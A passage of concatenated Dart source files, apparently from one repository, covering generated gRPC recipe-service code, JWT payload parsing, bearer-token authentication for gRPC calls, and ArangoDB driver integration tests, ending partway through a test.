$2.G_GRecipeService_SearchNullable_Return>(
'SearchNullable',
searchNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_SearchNullable_Parameters.fromBuffer(value),
($2.G_GRecipeService_SearchNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$0.GListOfRecipe,
$2.G_GRecipeService_InsertMany_Return>(
'InsertMany',
insertMany_Pre,
false,
false,
($core.List<$core.int> value) => $0.GListOfRecipe.fromBuffer(value),
($2.G_GRecipeService_InsertMany_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_GetNullable_Parameters,
$2.G_GRecipeService_GetNullable_Return>(
'GetNullable',
getNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetNullable_Parameters.fromBuffer(value),
($2.G_GRecipeService_GetNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_Count_Parameters,
$2.G_GRecipeService_Count_Return>(
'Count',
count_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_Count_Parameters.fromBuffer(value),
($2.G_GRecipeService_Count_Return value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_CountNullable_Parameters,
$2.G_GRecipeService_CountNullable_Return>(
'CountNullable',
countNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_CountNullable_Parameters.fromBuffer(value),
($2.G_GRecipeService_CountNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_Reindex_Parameters,
$2.G_GRecipeService_Reindex_Return>(
'Reindex',
reindex_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_Reindex_Parameters.fromBuffer(value),
($2.G_GRecipeService_Reindex_Return value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetMainRecipeType_Parameters,
$2.G_GRecipeService_GetMainRecipeType_Return>(
'GetMainRecipeType',
getMainRecipeType_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetMainRecipeType_Parameters.fromBuffer(value),
($2.G_GRecipeService_GetMainRecipeType_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters,
$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>(
'GetMainRecipeTypeNullable',
getMainRecipeTypeNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters.fromBuffer(
value),
($2.G_GRecipeService_GetMainRecipeTypeNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetRecipeTypeList_Parameters,
$2.G_GRecipeService_GetRecipeTypeList_Return>(
'GetRecipeTypeList',
getRecipeTypeList_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetRecipeTypeList_Parameters.fromBuffer(value),
($2.G_GRecipeService_GetRecipeTypeList_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters,
$2.G_GRecipeService_GetRecipeTypeListNullable_Return>(
'GetRecipeTypeListNullable',
getRecipeTypeListNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters.fromBuffer(
value),
($2.G_GRecipeService_GetRecipeTypeListNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_GetListOfInts_Parameters,
$2.G_GRecipeService_GetListOfInts_Return>(
'GetListOfInts',
getListOfInts_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetListOfInts_Parameters.fromBuffer(value),
($2.G_GRecipeService_GetListOfInts_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_GetListOfIntsNullable_Parameters,
$2.G_GRecipeService_GetListOfIntsNullable_Return>(
'GetListOfIntsNullable',
getListOfIntsNullable_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetListOfIntsNullable_Parameters.fromBuffer(
value),
($2.G_GRecipeService_GetListOfIntsNullable_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$3.GCalcParameters, $4.GCalcResult>(
'DoCalculation',
doCalculation_Pre,
false,
false,
($core.List<$core.int> value) => $3.GCalcParameters.fromBuffer(value),
($4.GCalcResult value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters,
$2.G_GRecipeService_ReceiveLotsOfArgs_Return>(
'ReceiveLotsOfArgs',
receiveLotsOfArgs_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters.fromBuffer(value),
($2.G_GRecipeService_ReceiveLotsOfArgs_Return value) =>
value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters,
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>(
'ReceiveLotsOfNullableArgs',
receiveLotsOfNullableArgs_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters.fromBuffer(
value),
($2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return value) =>
value.writeToBuffer()));
}
$async.Future<$0.GRecipe> create_Pre(
$grpc.ServiceCall call, $async.Future<$0.GRecipe> request) async {
return create(call, await request);
}
$async.Future<$0.GRecipe> update_Pre(
$grpc.ServiceCall call, $async.Future<$0.GRecipe> request) async {
return update(call, await request);
}
$async.Future<$2.G_GRecipeService_Delete_Return> delete_Pre(
$grpc.ServiceCall call, $async.Future<$1.GKey> request) async {
return delete(call, await request);
}
$async.Future<$0.GRecipe> get_Pre(
$grpc.ServiceCall call, $async.Future<$1.GKey> request) async {
return get(call, await request);
}
$async.Future<$0.GListOfRecipe> search_Pre($grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_Search_Parameters> request) async {
return search(call, await request);
}
$async.Future<$2.G_GRecipeService_SearchNullable_Return> searchNullable_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_SearchNullable_Parameters>
request) async {
return searchNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_InsertMany_Return> insertMany_Pre(
$grpc.ServiceCall call, $async.Future<$0.GListOfRecipe> request) async {
return insertMany(call, await request);
}
$async.Future<$2.G_GRecipeService_GetNullable_Return> getNullable_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetNullable_Parameters> request) async {
return getNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_Count_Return> count_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_Count_Parameters> request) async {
return count(call, await request);
}
$async.Future<$2.G_GRecipeService_CountNullable_Return> countNullable_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_CountNullable_Parameters>
request) async {
return countNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_Reindex_Return> reindex_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_Reindex_Parameters> request) async {
return reindex(call, await request);
}
$async.Future<$2.G_GRecipeService_GetMainRecipeType_Return>
getMainRecipeType_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetMainRecipeType_Parameters>
request) async {
return getMainRecipeType(call, await request);
}
$async.Future<$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>
getMainRecipeTypeNullable_Pre(
$grpc.ServiceCall call,
$async.Future<
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters>
request) async {
return getMainRecipeTypeNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_GetRecipeTypeList_Return>
getRecipeTypeList_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetRecipeTypeList_Parameters>
request) async {
return getRecipeTypeList(call, await request);
}
$async.Future<$2.G_GRecipeService_GetRecipeTypeListNullable_Return>
getRecipeTypeListNullable_Pre(
$grpc.ServiceCall call,
$async.Future<
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters>
request) async {
return getRecipeTypeListNullable(call, await request);
}
$async.Future<$2.G_GRecipeService_GetListOfInts_Return> getListOfInts_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetListOfInts_Parameters>
request) async {
return getListOfInts(call, await request);
}
$async.Future<$2.G_GRecipeService_GetListOfIntsNullable_Return>
getListOfIntsNullable_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_GetListOfIntsNullable_Parameters>
request) async {
return getListOfIntsNullable(call, await request);
}
$async.Future<$4.GCalcResult> doCalculation_Pre(
$grpc.ServiceCall call, $async.Future<$3.GCalcParameters> request) async {
return doCalculation(call, await request);
}
$async.Future<$2.G_GRecipeService_ReceiveLotsOfArgs_Return>
receiveLotsOfArgs_Pre(
$grpc.ServiceCall call,
$async.Future<$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters>
request) async {
return receiveLotsOfArgs(call, await request);
}
$async.Future<$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>
receiveLotsOfNullableArgs_Pre(
$grpc.ServiceCall call,
$async.Future<
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters>
request) async {
return receiveLotsOfNullableArgs(call, await request);
}
$async.Future<$0.GRecipe> create($grpc.ServiceCall call, $0.GRecipe request);
$async.Future<$0.GRecipe> update($grpc.ServiceCall call, $0.GRecipe request);
$async.Future<$2.G_GRecipeService_Delete_Return> delete(
$grpc.ServiceCall call, $1.GKey request);
$async.Future<$0.GRecipe> get($grpc.ServiceCall call, $1.GKey request);
$async.Future<$0.GListOfRecipe> search(
$grpc.ServiceCall call, $2.G_GRecipeService_Search_Parameters request);
$async.Future<$2.G_GRecipeService_SearchNullable_Return> searchNullable(
$grpc.ServiceCall call,
$2.G_GRecipeService_SearchNullable_Parameters request);
$async.Future<$2.G_GRecipeService_InsertMany_Return> insertMany(
$grpc.ServiceCall call, $0.GListOfRecipe request);
$async.Future<$2.G_GRecipeService_GetNullable_Return> getNullable(
$grpc.ServiceCall call,
$2.G_GRecipeService_GetNullable_Parameters request);
$async.Future<$2.G_GRecipeService_Count_Return> count(
$grpc.ServiceCall call, $2.G_GRecipeService_Count_Parameters request);
$async.Future<$2.G_GRecipeService_CountNullable_Return> countNullable(
$grpc.ServiceCall call,
$2.G_GRecipeService_CountNullable_Parameters request);
$async.Future<$2.G_GRecipeService_Reindex_Return> reindex(
$grpc.ServiceCall call, $2.G_GRecipeService_Reindex_Parameters request);
$async.Future<$2.G_GRecipeService_GetMainRecipeType_Return> getMainRecipeType(
$grpc.ServiceCall call,
$2.G_GRecipeService_GetMainRecipeType_Parameters request);
$async.Future<$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>
getMainRecipeTypeNullable($grpc.ServiceCall call,
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters request);
$async.Future<$2.G_GRecipeService_GetRecipeTypeList_Return> getRecipeTypeList(
$grpc.ServiceCall call,
$2.G_GRecipeService_GetRecipeTypeList_Parameters request);
$async.Future<$2.G_GRecipeService_GetRecipeTypeListNullable_Return>
getRecipeTypeListNullable($grpc.ServiceCall call,
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters request);
$async.Future<$2.G_GRecipeService_GetListOfInts_Return> getListOfInts(
$grpc.ServiceCall call,
$2.G_GRecipeService_GetListOfInts_Parameters request);
$async.Future<$2.G_GRecipeService_GetListOfIntsNullable_Return>
getListOfIntsNullable($grpc.ServiceCall call,
$2.G_GRecipeService_GetListOfIntsNullable_Parameters request);
$async.Future<$4.GCalcResult> doCalculation(
$grpc.ServiceCall call, $3.GCalcParameters request);
$async.Future<$2.G_GRecipeService_ReceiveLotsOfArgs_Return> receiveLotsOfArgs(
$grpc.ServiceCall call,
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters request);
$async.Future<$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>
receiveLotsOfNullableArgs($grpc.ServiceCall call,
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters request);
}
<|start_filename|>grpc_host/lib/src/configuration/file_yaml_extension.dart<|end_filename|>
import 'dart:io';
import 'package:yaml/yaml.dart';
extension FileYamlExtension on File {
YamlMap? readYaml() {
if (!existsSync()) {
return null;
}
final text = readAsStringSync();
var map = loadYaml(text) as YamlMap?;
return map;
}
}
<|start_filename|>proto_mapper/test/lib/src/recipe_type.dart<|end_filename|>
import 'package:proto_annotations/proto_annotations.dart';
import 'package:proto_generator_test/grpc/recipe_type.pbenum.dart';
part 'recipe_type.g.dart';
@proto
@mapProto
enum RecipeTypes {
cook,
grill,
fry,
stew,
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_user.dart<|end_filename|>
class FirebaseUser {
final String? email;
final String? displayName;
final String? providerId;
final String? rawId;
final bool disabled;
final bool emailVerified;
final String? tenantId;
final List<dynamic>? providerUserInfo;
final int tokensValidAfterMillis;
final Map<String, dynamic>? userMetadata;
final Map<String, dynamic>? customClaims;
FirebaseUser({
required this.email,
required this.displayName,
required this.providerId,
required this.rawId,
required this.disabled,
required this.emailVerified,
required this.tokensValidAfterMillis,
this.providerUserInfo,
this.userMetadata,
this.customClaims,
required this.tenantId,
});
}
<|start_filename|>entity/test/lib/src/category.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'category.dart';
// **************************************************************************
// ValidatorGenerator
// **************************************************************************
class $CategoryValidator implements Validator {
const $CategoryValidator();
ValidationError? validateTitle(String value, {Category? entity}) {
if (value.isEmpty) {
return RequiredValidationError('title');
}
return null;
}
ValidationError? $validateTitle(String? value, {Category? entity}) {
if (value == null) {
return RequiredValidationError('title');
}
return validateTitle(value, entity: entity);
}
@override
ErrorList validate(covariant Category entity) {
var errors = <ValidationError>[];
ValidationError? error;
if ((error = validateTitle(entity.title, entity: entity)) != null) {
errors.add(error!);
}
return ErrorList(errors);
}
@override
void validateThrowing(covariant Category entity) {
var errors = validate(entity);
if (errors.validationErrors.isNotEmpty) throw errors;
}
}
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_services_generator_base.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
class ProtoServicesGeneratorBase {
final String className;
final ClassElement classElement;
final String prefix;
final String serviceClassName;
ProtoServicesGeneratorBase._({
required this.prefix,
required this.classElement,
required this.className,
}) : serviceClassName = className.endsWith('Base')
? className.substring(0, className.length - 4)
: className.endsWith('Interface')
? className.substring(0, className.length - 'Interface'.length)
: className;
ProtoServicesGeneratorBase({
required String prefix,
required ClassElement classElement,
}) : this._(
prefix: prefix,
classElement: classElement,
className: classElement.name,
);
String getParameterMessageName(String methodName) =>
'G_$prefix${serviceClassName}_${methodName}_Parameters';
String getReturnMessageName(String methodName) =>
'G_$prefix${serviceClassName}_${methodName}_Return';
}
<|start_filename|>arango_driver/lib/src/query/line_if_then_else.dart<|end_filename|>
import 'query_text_fragment.dart';
/// Line of query text with condition.
/// If [bool] `cond` is true, then [String] `when_true` will pasted into query.
/// Else [String] `when_false` willpasted into query.
/// Sample:
/// ```
/// Query([
/// Line('FOR doc in documents'),
/// LineIfThen(tag != null, 'FILTER doc.tags && POSITION( doc.tags, tag )'),
/// Line('SORT doc.datetime'),
/// LineIfThenElse(
/// without_content, 'return UNSET( doc, "content" )', 'return doc'),
/// ...
/// ])
/// ```
class LineIfThenElse extends QueryTextFragment {
LineIfThenElse(bool cond, String whenTrue, String whenFalse)
: super(cond ? whenTrue : whenFalse);
}
<|start_filename|>squarealfa_security/lib/src/jwt_payload.dart<|end_filename|>
/// Represents the payload content of a JWT token.
class JwtPayload {
final String subject;
final String email;
final String name;
final String issuer;
final String audience;
final DateTime notBefore;
final DateTime expires;
final bool emailVerified;
final bool isVerified;
final String tenantId;
final String tid;
final bool isAdministrator;
final List<String> permissions;
/// any other extra fields that are
/// not represented in the available properties
/// are stored in this property.
final Map<String, dynamic> extra;
const JwtPayload({
required this.subject,
required this.email,
required this.name,
required this.issuer,
required this.audience,
required this.notBefore,
required this.expires,
this.emailVerified = false,
this.isVerified = false,
this.tenantId = '',
this.tid = '',
this.permissions = const [],
this.isAdministrator = false,
this.extra = const <String, dynamic>{},
});
factory JwtPayload.fromMap(Map<String, dynamic> map) {
var name = '';
var subject = '';
var email = '';
var tenantId = '';
var tid = '';
var issuer = '';
var audience = '';
var permissions = const <String>[];
var isAdministrator = false;
var nbf = DateTime.now();
var exp = DateTime.now();
var emailVerified = false;
var extra = <String, dynamic>{};
for (var entry in map.entries) {
switch (entry.key) {
case 'name':
name = entry.value;
break;
case 'sub':
subject = entry.value;
break;
case 'email':
email = entry.value;
break;
case 'tid':
tid = entry.value ?? '';
break;
case 'tenantId':
tenantId = entry.value ?? '';
break;
case 'iss':
issuer = entry.value;
break;
case 'aud':
audience = entry.value;
break;
case 'nbf':
nbf = _getDateTime(entry.value.toString());
break;
case 'exp':
exp = _getDateTime(entry.value.toString());
break;
case 'scp':
permissions = entry.value as List<String>;
break;
case 'adm':
isAdministrator = entry.value;
break;
case 'email_verified':
emailVerified =
(entry.value.toString()).toLowerCase().trim() == 'true';
break;
default:
extra[entry.key] = entry.value;
break;
}
}
var payload = JwtPayload(
name: name,
subject: subject,
email: email,
issuer: issuer,
audience: audience,
notBefore: nbf,
expires: exp,
extra: extra,
emailVerified: emailVerified,
tenantId: tenantId,
tid: tid,
permissions: permissions,
isAdministrator: isAdministrator);
return payload;
}
JwtPayload copyWith({
String? subject,
String? email,
String? name,
String? issuer,
String? audience,
DateTime? notBefore,
DateTime? expires,
String? userId,
String? tenantId,
String? tid,
List<String>? roles,
bool? isVerified,
bool? emailVerified,
Map<String, dynamic>? extra,
}) {
var ret = JwtPayload(
subject: subject ?? this.subject,
email: email ?? this.email,
name: name ?? this.name,
issuer: issuer ?? this.issuer,
audience: audience ?? this.audience,
notBefore: notBefore ?? this.notBefore,
expires: expires ?? this.expires,
extra: extra ?? this.extra,
isVerified: isVerified ?? this.isVerified,
emailVerified: emailVerified ?? this.emailVerified,
tenantId: tenantId ?? this.tenantId,
tid: tid ?? this.tid,
);
return ret;
}
Map<String, dynamic> get claimsMap {
var nbf = _getEpochSeconds(notBefore);
var exp = _getEpochSeconds(expires);
var map = <String, dynamic>{};
_addClaimIfNotNull(map, 'name', name);
_addClaimIfNotNull(map, 'sub', subject);
_addClaimIfNotNull(map, 'email', email);
_addClaimIfNotNull(map, 'iss', issuer);
_addClaimIfNotNull(map, 'aud', audience);
_addClaimIfNotNull(map, 'nbf', nbf);
_addClaimIfNotNull(map, 'exp', exp);
_addClaimIfNotNull(map, 'adm', isAdministrator);
_addClaimIfNotNull(map, 'scp', permissions);
_addClaimIfNotNullOrEmpty(map, 'tenantId', tenantId);
_addClaimIfNotNullOrEmpty(map, 'tid', tid);
for (var claim in extra.entries) {
_addClaimIfNotNull(map, claim.key, claim.value);
}
return map;
}
static String? _getEpochSeconds(DateTime? value) =>
value == null ? null : (value.millisecondsSinceEpoch ~/ 1000).toString();
static DateTime _getDateTime(String secondsAsString) {
var seconds = int.parse(secondsAsString);
var dt = DateTime.fromMillisecondsSinceEpoch(seconds * 1000);
return dt;
}
static void _addClaimIfNotNull(
Map<String, dynamic> claimsMap,
String claim,
dynamic value,
) {
if (value != null) claimsMap[claim] = value;
}
static void _addClaimIfNotNullOrEmpty(
Map<String, dynamic> claimsMap,
String claim,
String? value,
) {
if (value != null && value.isNotEmpty) claimsMap[claim] = value;
}
}
<|start_filename|>grpc_host/example/demo_service.pbgrpc.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: demo_service.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:async' as $async;
import 'dart:core' as $core;
import 'package:grpc/service_api.dart' as $grpc;
import 'demo_service.pb.dart' as $0;
export 'demo_service.pb.dart';
class GDemoServiceClient extends $grpc.Client {
static final _$insertPerson =
$grpc.ClientMethod<$0.GPerson, $0.GPersonInsertResult>(
'/GDemoService/InsertPerson',
($0.GPerson value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$0.GPersonInsertResult.fromBuffer(value));
GDemoServiceClient($grpc.ClientChannel channel,
{$grpc.CallOptions? options,
$core.Iterable<$grpc.ClientInterceptor>? interceptors})
: super(channel, options: options, interceptors: interceptors);
$grpc.ResponseFuture<$0.GPersonInsertResult> insertPerson($0.GPerson request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$insertPerson, request, options: options);
}
}
abstract class GDemoServiceBase extends $grpc.Service {
$core.String get $name => 'GDemoService';
GDemoServiceBase() {
$addMethod($grpc.ServiceMethod<$0.GPerson, $0.GPersonInsertResult>(
'InsertPerson',
insertPerson_Pre,
false,
false,
($core.List<$core.int> value) => $0.GPerson.fromBuffer(value),
($0.GPersonInsertResult value) => value.writeToBuffer()));
}
$async.Future<$0.GPersonInsertResult> insertPerson_Pre(
$grpc.ServiceCall call, $async.Future<$0.GPerson> request) async {
return insertPerson(call, await request);
}
$async.Future<$0.GPersonInsertResult> insertPerson(
$grpc.ServiceCall call, $0.GPerson request);
}
<|start_filename|>grpc_host/lib/src/security/authentication_extensions.dart<|end_filename|>
import 'dart:async';
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'package:squarealfa_security/squarealfa_security.dart';
import 'principal.dart';
part 'service_call_extra.dart';
extension AuthenticationExtensions on ServiceCall {
static final Expando _storage = Expando();
Principal get principal {
return _extra.principal ?? Principal.unauthenticated();
}
JwtPayload? get jwtPayload => _extra.jwtPayload;
_ServiceCallExtra get _extra {
var ret = _storage[this] ??= _ServiceCallExtra();
return ret as _ServiceCallExtra;
}
Future authenticate({
required Future<JwtPayload> Function(String token) getTokenPayload,
required Future<Principal> Function(JwtPayload payload) createPrincipal,
}) async {
Principal? localPrincipal;
try {
final authHeader = clientMetadata?['authorization'];
if (authHeader == null) {
_extra.jwtPayload = null;
_extra.principal = null;
return;
}
final idToken = authHeader.startsWith('Bearer ')
? authHeader.substring(7)
: throw 'Invalid auth header';
var payload = await getTokenPayload(idToken);
if (!payload.isVerified) throw 'Unverified token';
if (!payload.emailVerified) throw 'Email is not verified';
if (payload.expires.difference(DateTime.now()).isNegative) {
throw 'Expired token';
}
_extra.jwtPayload = payload;
localPrincipal = await createPrincipal(payload);
} catch (e) {
throw GrpcError.unauthenticated();
} finally {
_extra.principal = localPrincipal;
}
return;
}
}
void authenticateCalls(ServiceCall context) {
var principal = context.principal;
if (!principal.isAuthenticated) {
throw GrpcError.unauthenticated();
}
}
<|start_filename|>arango_driver/lib/src/results/create_database_info.dart<|end_filename|>
import 'database_user.dart';
class CreateDatabaseInfo {
final String name;
final List<DatabaseUser> databaseUsers;
const CreateDatabaseInfo(
this.name, [
this.databaseUsers = const [],
]);
}
<|start_filename|>map_mapper/map_mapper_generator/lib/map_mapper_generator.dart<|end_filename|>
/// Generates code that maps (converts) between instances of business
/// classes to Map<String, dynamic> and back.
library map_mapper_generator;
import 'package:build/build.dart';
import 'package:source_gen/source_gen.dart';
import 'src/map_map_generator.dart';
Builder mapMapBuilder(BuilderOptions options) =>
SharedPartBuilder([MapMapGenerator(options)], 'map_map');
<|start_filename|>grpc_host/example/demo_service.pbjson.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: demo_service.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields,deprecated_member_use_from_same_package
import 'dart:core' as $core;
import 'dart:convert' as $convert;
import 'dart:typed_data' as $typed_data;
@$core.Deprecated('Use gPersonDescriptor instead')
const GPerson$json = {
'1': 'GPerson',
'2': [
{'1': 'key', '3': 1, '4': 1, '5': 9, '10': 'key'},
{'1': 'name', '3': 2, '4': 1, '5': 9, '10': 'name'},
],
};
/// Descriptor for `GPerson`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gPersonDescriptor = $convert.base64Decode(
'<KEY>');
@$core.Deprecated('Use gPersonInsertResultDescriptor instead')
const GPersonInsertResult$json = {
'1': 'GPersonInsertResult',
'2': [
{'1': 'key', '3': 1, '4': 1, '5': 9, '10': 'key'},
],
};
/// Descriptor for `GPersonInsertResult`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gPersonInsertResultDescriptor = $convert
.base64Decode('<KEY>');
<|start_filename|>firebase-auth-admin/lib/src/firebase_token.dart<|end_filename|>
class FirebaseToken {
final int authTime;
final String issuer;
final String audience;
final int expires;
final int issuedAt;
final String subject;
final String uid;
final FirebaseInfo firebaseInfo;
FirebaseToken({
required this.authTime,
required this.issuer,
required this.audience,
required this.expires,
required this.issuedAt,
required this.subject,
required this.uid,
required this.firebaseInfo,
});
}
class FirebaseInfo {
final String signInProvider;
final String tenant;
final Map<String, dynamic> identities;
FirebaseInfo({
required this.signInProvider,
required this.tenant,
required this.identities,
});
}
<|start_filename|>arango_driver/test/arango_driver_test.dart<|end_filename|>
import 'package:arango_driver/arango_driver.dart';
import 'package:test/test.dart';
import 'test_conf.dart';
void main() {
group('Client can:', () {
final sch = dbscheme;
final h = dbhost;
final p = dbport;
const systemDb = '_system';
const testDb = 'test_temp_db';
const testCollection = 'test_temp_collection';
late String testDocumentKey;
String testDocumentRev;
var testMultipleDocumentsKeys = <String>[];
final u = dbuser;
final ps = dbpass;
const realm = '';
var clientSystemDb = ArangoDBClient(
scheme: sch,
host: h,
port: p,
db: systemDb,
user: u,
pass: ps,
realm: realm);
test('Get current db info', () async {
var answer = await clientSystemDb.currentDatabase();
if (answer.result.error) {
print(answer);
}
expect(answer.response!.name, equals(systemDb));
expect(answer.response!.isSystem, equals(true));
});
test('List of accessible databases', () async {
var answer = await clientSystemDb.userDatabases();
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, equals(false));
expect(answer.response, contains(systemDb));
});
test('List of all existing databases', () async {
var answer = await clientSystemDb.existingDatabases();
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, equals(false));
expect(answer.response, contains(systemDb));
});
test('Create a database', () async {
// first, ask about all databases
var databases = await clientSystemDb.existingDatabases();
// skip test if test database already exists
if (databases.response!.contains(testDb)) {
print(
// ignore: lines_longer_than_80_chars
'Skip test for creating database because database $testDb already exists.');
return;
}
// creating the test database
var result = await clientSystemDb.createDatabase(
CreateDatabaseInfo(testDb, [DatabaseUser('u', 'ps')]));
expect(result.result.error, equals(false));
expect(result.response, equals(true));
});
// changing current database
var testDbClient = ArangoDBClient(
scheme: sch,
host: h,
port: p,
db: testDb,
user: u,
pass: ps,
realm: realm);
test('create collection', () async {
var allCollectionsAnsw = await testDbClient.allCollections();
var alreadyExists = allCollectionsAnsw.response!
.any((coll) => coll.name == testCollection);
if (alreadyExists) {
print('Skip creating collection $testCollection bexause it is exists');
} else {
var answer = await testDbClient
.createCollection(CollectionCriteria(testCollection));
if (answer.result.error == true) {
print(answer);
}
expect(answer.result.error, false);
expect(answer.collectionInfo.name, testCollection);
}
});
test('truncate collection', () async {
var answer = await testDbClient.truncateCollection(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
expect(answer.collectionInfo.name, testCollection);
});
test('get collection info', () async {
var answer = await testDbClient.collectionInfo(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
expect(answer.collectionInfo.name, testCollection);
});
test('get collection properties', () async {
var answer = await testDbClient.collectionProperties(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('get count of documents in collection', () async {
var answer = await testDbClient.documentsCount(testCollection);
if (answer.result.error == true) {
print(answer);
}
expect(answer.result.error, false);
});
test('get statistics for a collection', () async {
var answer = await testDbClient.collectionStatistics(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('get collection revision id', () async {
var answer = await testDbClient.collectionRevisionId(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('get collection checksum', () async {
var answer = await testDbClient.collectionChecksum(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('get all collections', () async {
var answer = await testDbClient.allCollections();
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('create document', () async {
var answer =
await testDbClient.createDocument(testCollection, {'Hello': 'World'});
if (answer.result.error) {
print(answer);
}
// save document key for next test:
testDocumentKey = answer.identifier.key;
});
test('getDocumentByKey returns Map with _key', () async {
var answer =
await testDbClient.getDocumentByKey(testCollection, testDocumentKey);
if (answer.result.error) {
print(answer);
}
expect(answer.document, contains('_key'));
});
test('getDocumentByKey can require document revision', () async {
// first get the doc:
var answer =
await testDbClient.getDocumentByKey(testCollection, testDocumentKey);
// get its revision:
expect(answer.document, contains('_rev'));
if (answer.result.error) {
print(answer);
}
// save its revision:
testDocumentRev = answer.document['_rev'] as String;
// now try to get the document with not matched revision:
var emptyAnswer = await testDbClient.getDocumentByKey(
testCollection, testDocumentKey,
ifNoneMatchRevision: testDocumentRev);
// because last revision equals ${testDocumentRev}
// server answer will empty:
expect(emptyAnswer.document, equals({}));
// get document only required revision:
var answerWithRevision = await testDbClient.getDocumentByKey(
testCollection, testDocumentKey,
ifMatchRevision: testDocumentRev);
expect(answerWithRevision.document, contains('_rev'));
